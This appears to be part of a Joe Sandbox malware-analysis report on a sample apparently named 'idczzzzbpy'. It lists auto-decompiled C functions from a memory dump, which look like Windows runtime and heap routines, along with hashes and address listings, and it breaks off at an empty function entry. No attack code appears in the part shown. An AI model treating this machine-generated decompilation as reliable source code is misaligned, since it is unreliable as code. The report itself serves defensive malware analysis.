                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0698f175149da0747b5147b13cc42ba0242103f6c9de47b5ccfeef85dcb04e96
                    • Instruction ID: 508cf18ac10d64069f66952d6a60457f539bd68da55c5409c0c1cf67be84f278
                    • Opcode Fuzzy Hash: 0698f175149da0747b5147b13cc42ba0242103f6c9de47b5ccfeef85dcb04e96
                    • Instruction Fuzzy Hash: 4601D2B2A026119BC3379B1E9D40E26BBA6FF85A60B57406DE9498B315DB30CC01CBC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169002D Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0169002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01687D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01687D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01687D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01687D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                    0x01690032
                    0x01690037
                    0x01690043
                    0x016d4b3a
                    0x01690049
                    0x01690049
                    0x01690049
                    0x0169004e
                    0x01690053
                    0x016d4b48
                    0x016d4b5a
                    0x016d4b4a
                    0x016d4b53
                    0x016d4b53
                    0x016d4b5f
                    0x00000000
                    0x016d4b61
                    0x00000000
                    0x016d4b61
                    0x01690059
                    0x01690059
                    0x01690060
                    0x016d4b6f
                    0x016d4b6f
                    0x01690069
                    0x016d4b83
                    0x00000000
                    0x00000000
                    0x016d4b90
                    0x016d4b9b
                    0x016d4b9b
                    0x016d4ba4
                    0x00000000
                    0x00000000
                    0x016d4baa
                    0x00000000
                    0x0169006f
                    0x0169006f
                    0x00000000
                    0x0169006f
                    0x01690069

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                    • Instruction ID: fcd8ae14c8a016e0e0c6d21fc078b10cd13b907ae33092bb576a024f8d38194c
                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                    • Instruction Fuzzy Hash: EB118E32A05681CFEB229B28DD44B357B9DEF51754F1900A0ED148BB92EB38DC42C764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167766D Relevance: .1, Instructions: 54COMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E0167766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0169F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0169F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01684620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                    0x01677672
                    0x0167767f
                    0x01677689
                    0x016776de
                    0x016776de
                    0x0167768b
                    0x01677691
                    0x01677693
                    0x01677697
                    0x00000000
                    0x01677699
                    0x016776a8
                    0x00000000
                    0x016776aa
                    0x016776ad
                    0x016776b1
                    0x00000000
                    0x016776b3
                    0x016776b3
                    0x016776b5
                    0x016776ba
                    0x016776bc
                    0x016776bc
                    0x016776c0
                    0x00000000
                    0x016776c2
                    0x016776ce
                    0x016776ce
                    0x016776c0
                    0x016776b1
                    0x016776a8
                    0x01677697
                    0x016776d9

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                    • Instruction ID: 058afe60765666a6444c633afdba661cb389a062e86730d2810a3d830be3dcaf
                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                    • Instruction Fuzzy Hash: A801AC32700129ABDB20DE5ECC45E5B7BADEB84660F350564BA08CB254DA30DD01C7A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01669080 Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E01669080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x17585ec;
				E01682280(_t48, 0x17585ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0167FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x175538c; // 0x77576828
					if( *_t84 != 0x1755388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x173f6e8);
						E016BD0E8(0x17585ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E017388F5(_t80, _t85, 0x1755388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x17586c0; // 0x12007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x17586b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01682280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E017388F5(0x17585ec, _t85, 0x1755388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E016AAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x175b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x17584c0;
																			if(_t82 >=  *0x17584c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E01739063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0166922A(_t99);
										_t64 = E01687D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01738B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x17586c0; // 0x12007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x17586b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x17586bc;
													_t87 = 0x17586b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01669240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x17586c4;
												_t87 = 0x17586c0;
												L27:
												E01699B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E016BD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1755388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x175538c = _t51;
						goto L6;
					}
				}
			}




















                    0x01669082
                    0x01669083
                    0x01669084
                    0x01669085
                    0x01669087
                    0x01669096
                    0x01669098
                    0x01669098
                    0x0166909e
                    0x016690a8
                    0x016690e7
                    0x016690e7
                    0x016690aa
                    0x016690b0
                    0x016690b7
                    0x016690bd
                    0x016690dd
                    0x016690e6
                    0x016690bf
                    0x016690bf
                    0x016690c7
                    0x016690cf
                    0x016690f1
                    0x016690f2
                    0x016690f4
                    0x016690f5
                    0x016690f6
                    0x016690f7
                    0x016690f8
                    0x016690f9
                    0x016690fa
                    0x016690fb
                    0x016690fc
                    0x016690fd
                    0x016690fe
                    0x016690ff
                    0x01669100
                    0x01669102
                    0x01669107
                    0x0166910c
                    0x01669110
                    0x01669113
                    0x01669115
                    0x01669136
                    0x0166913f
                    0x01669143
                    0x016c37e4
                    0x016c37e4
                    0x01669117
                    0x01669117
                    0x0166911d
                    0x00000000
                    0x0166911f
                    0x0166911f
                    0x01669125
                    0x00000000
                    0x01669127
                    0x0166912d
                    0x01669130
                    0x01669134
                    0x01669158
                    0x0166915d
                    0x01669161
                    0x01669168
                    0x016c3715
                    0x0166916e
                    0x0166916e
                    0x01669175
                    0x01669177
                    0x0166917e
                    0x0166917f
                    0x01669182
                    0x01669182
                    0x01669187
                    0x01669187
                    0x0166918a
                    0x0166918d
                    0x0166918f
                    0x01669192
                    0x01669195
                    0x01669198
                    0x01669198
                    0x01669198
                    0x0166919a
                    0x00000000
                    0x00000000
                    0x016c371f
                    0x016c3721
                    0x016c3727
                    0x016c372f
                    0x016c3733
                    0x016c3735
                    0x016c3738
                    0x016c373b
                    0x016c373d
                    0x016c3740
                    0x00000000
                    0x016c3746
                    0x016c3746
                    0x016c3749
                    0x00000000
                    0x016c374f
                    0x016c374f
                    0x016c3751
                    0x016c3757
                    0x016c3759
                    0x016c375c
                    0x016c375c
                    0x016c375e
                    0x016c375e
                    0x016c3761
                    0x016c3764
                    0x00000000
                    0x00000000
                    0x016c3766
                    0x016c3768
                    0x016c37a3
                    0x016c37a3
                    0x016c37a5
                    0x016c37a7
                    0x016c37ad
                    0x016c37b0
                    0x016c37b2
                    0x016c37bc
                    0x016c37c2
                    0x016c37c2
                    0x016c37b2
                    0x01669187
                    0x01669187
                    0x0166918a
                    0x0166918d
                    0x0166918f
                    0x01669192
                    0x01669195
                    0x00000000
                    0x01669195
                    0x00000000
                    0x016c376a
                    0x016c376a
                    0x016c376a
                    0x016c376c
                    0x016c376c
                    0x016c376f
                    0x016c3775
                    0x00000000
                    0x00000000
                    0x016c3777
                    0x016c3779
                    0x016c3782
                    0x016c3787
                    0x016c3789
                    0x016c3790
                    0x016c3790
                    0x016c378b
                    0x016c378b
                    0x016c378b
                    0x016c3792
                    0x016c3795
                    0x00000000
                    0x016c3795
                    0x00000000
                    0x016c3779
                    0x016c3798
                    0x00000000
                    0x016c3798
                    0x00000000
                    0x016c3768
                    0x016c379b
                    0x016c379b
                    0x016c3751
                    0x016c3749
                    0x00000000
                    0x016c3740
                    0x016691a0
                    0x016691a3
                    0x016691a9
                    0x016691b0
                    0x00000000
                    0x016691b0
                    0x01669187
                    0x016691b4
                    0x016691b4
                    0x016691bb
                    0x016691c0
                    0x016691c5
                    0x016691c7
                    0x016c37da
                    0x016691cd
                    0x016691cd
                    0x016691cd
                    0x016691d2
                    0x016691d5
                    0x01669239
                    0x01669239
                    0x016691d7
                    0x016691db
                    0x016691e1
                    0x016691e7
                    0x016691fd
                    0x01669203
                    0x0166921e
                    0x01669223
                    0x00000000
                    0x01669205
                    0x01669205
                    0x01669208
                    0x0166920c
                    0x01669214
                    0x01669214
                    0x0166920c
                    0x016691e9
                    0x016691e9
                    0x016691ee
                    0x016691f3
                    0x016691f3
                    0x016691f3
                    0x016691e7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01669134
                    0x01669125
                    0x0166911d
                    0x0166914e
                    0x016690d1
                    0x016690d1
                    0x016690d3
                    0x016690d6
                    0x016690d8
                    0x00000000
                    0x016690d8
                    0x016690cf

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb96cbc9dbeb82213faa9412e4bce0b0ec0d22e5f0cb6b6fc0b222e81ccc178c
                    • Instruction ID: e6d31f2e0bbcbaf6ea186280345a0105a59e69eebf2d0239b5e058a702270e38
                    • Opcode Fuzzy Hash: eb96cbc9dbeb82213faa9412e4bce0b0ec0d22e5f0cb6b6fc0b222e81ccc178c
                    • Instruction Fuzzy Hash: C001AF726066048FD3259F18DC40B22BBADFB85328F25806EE9058B7A2C7B4DC41CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016FC450 Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E016FC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E016A9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E016A95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E016A95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E016A95D0();
				return L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                    0x016fc458
                    0x016fc45d
                    0x016fc466
                    0x016fc468
                    0x016fc469
                    0x016fc46a
                    0x016fc46b
                    0x016fc46e
                    0x016fc46f
                    0x016fc471
                    0x016fc476
                    0x016fc476
                    0x016fc47c
                    0x016fc47e
                    0x016fc480
                    0x016fc480
                    0x016fc483
                    0x016fc484
                    0x016fc486
                    0x016fc488
                    0x016fc48f
                    0x016fc491
                    0x016fc493
                    0x016fc493
                    0x016fc48f
                    0x016fc498
                    0x016fc49e
                    0x016fc4ad
                    0x016fc4ad
                    0x016fc4b2
                    0x016fc4b4
                    0x016fc4cd

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                    • Instruction ID: 14166b6f24d93d9715c292671b8604db8bb64d4d0254a220fd771d589525d484
                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                    • Instruction Fuzzy Hash: 2401967114050ABFE711AF69CC80E62FB6EFF54354F504529F25442660C721ACA0CAA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01734015 Relevance: .0, Instructions: 49COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E01734015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01682280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01682280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17586ac);
					E0166F900(0x17586d4, _t28);
					E0167FFB0(0x17586ac, _t28, 0x17586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0167FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                    0x0173401a
                    0x0173401e
                    0x01734023
                    0x01734028
                    0x01734029
                    0x0173402b
                    0x0173402f
                    0x01734043
                    0x01734046
                    0x01734051
                    0x01734057
                    0x0173405f
                    0x01734062
                    0x01734067
                    0x0173406f
                    0x0173407c
                    0x0173407c
                    0x0173408c
                    0x0173408c
                    0x01734097

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ed168972eaf0e4d64bf997ef3c29c19d0248853754684de2fe761485525262f
                    • Instruction ID: a04afd88a2cce58ac3abd5595d013730342d85672029f3bc1880d425a27d8b59
                    • Opcode Fuzzy Hash: 1ed168972eaf0e4d64bf997ef3c29c19d0248853754684de2fe761485525262f
                    • Instruction Fuzzy Hash: 2B017C72241946BFD351BB79CD90E13F7ADEB95660B00026DF51887A12CB64EC11C6E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172138A Relevance: .0, Instructions: 48COMMON
                    Download Yara Rule
                    C-Code - Quality: 61%
                    			E0172138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x175d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E016AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01687D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                    0x0172138a
                    0x0172138a
                    0x01721399
                    0x017213a3
                    0x017213a8
                    0x017213aa
                    0x017213b5
                    0x017213bb
                    0x017213c3
                    0x017213c6
                    0x017213c9
                    0x017213d4
                    0x017213e6
                    0x017213d6
                    0x017213df
                    0x017213df
                    0x017213f1
                    0x017213f2
                    0x017213f4
                    0x017213f9
                    0x0172140e

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 956912b67dc309ce9e587299f42e4d34db82378bb52b561b4728639069349e1f
                    • Instruction ID: d9131b5fdaf5e369e79318e55db44cf55a15dac3df8dd8a7d52c884c0aefb36d
                    • Opcode Fuzzy Hash: 956912b67dc309ce9e587299f42e4d34db82378bb52b561b4728639069349e1f
                    • Instruction Fuzzy Hash: 76019E71A00258AFCB10EFA8D841EAEBBB8EF44710F40406AF900EB281DA709E01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017214FB Relevance: .0, Instructions: 48COMMON
                    Download Yara Rule
                    C-Code - Quality: 61%
                    			E017214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x175d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E016AFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E01687D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                    0x017214fb
                    0x017214fb
                    0x0172150a
                    0x01721514
                    0x01721519
                    0x0172151b
                    0x01721526
                    0x0172152c
                    0x01721534
                    0x01721537
                    0x0172153a
                    0x01721545
                    0x01721557
                    0x01721547
                    0x01721550
                    0x01721550
                    0x01721562
                    0x01721563
                    0x01721565
                    0x0172156a
                    0x0172157f

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: acdd72008dd1d8e75a73587ac8727229e8acddb582c0edd157c1f8f8f302433c
                    • Instruction ID: e4247d74cf482450fd8298dfd940c7c7e3febbeef25f584dceacf9d1fc818b30
                    • Opcode Fuzzy Hash: acdd72008dd1d8e75a73587ac8727229e8acddb582c0edd157c1f8f8f302433c
                    • Instruction Fuzzy Hash: 5B019271A00258EFCB10DFA9D851EAEBBB8EF44710F50409AF914EB280D670DE01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016658EC Relevance: .0, Instructions: 47COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E016658EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x175d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1645c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01665943() != 0 &&  *0x1755320 > 5) {
					E016E7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E016E7B5E( &_v28, _t28);
					_t11 = E016E7B9C(0x1755320, 0x164bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E016AB640(_t11, _t17, _v8 ^ _t29, 0x164bf15, _t27, _t28);
			}















                    0x016658fb
                    0x016658fe
                    0x01665906
                    0x0166590a
                    0x0166593c
                    0x0166593c
                    0x0166590c
                    0x0166590c
                    0x01665911
                    0x00000000
                    0x01665913
                    0x01665913
                    0x01665913
                    0x01665911
                    0x0166591d
                    0x016c1035
                    0x016c103c
                    0x016c103f
                    0x016c1056
                    0x016c1056
                    0x0166593b

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8b6fe452f1bb7d7c1af8eecc727c6aa8896f5a4e03390573b05f69a8ca93b8e
                    • Instruction ID: 6431a6abfc51c03322c0aaaec2e38b12e1db318287f0c87af89898eb22059c4d
                    • Opcode Fuzzy Hash: d8b6fe452f1bb7d7c1af8eecc727c6aa8896f5a4e03390573b05f69a8ca93b8e
                    • Instruction Fuzzy Hash: 7101F231B00145DBCB24EE68DC069AF7BAEEF41170F8402AD9A0A97344DF70ED02C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01731074 Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
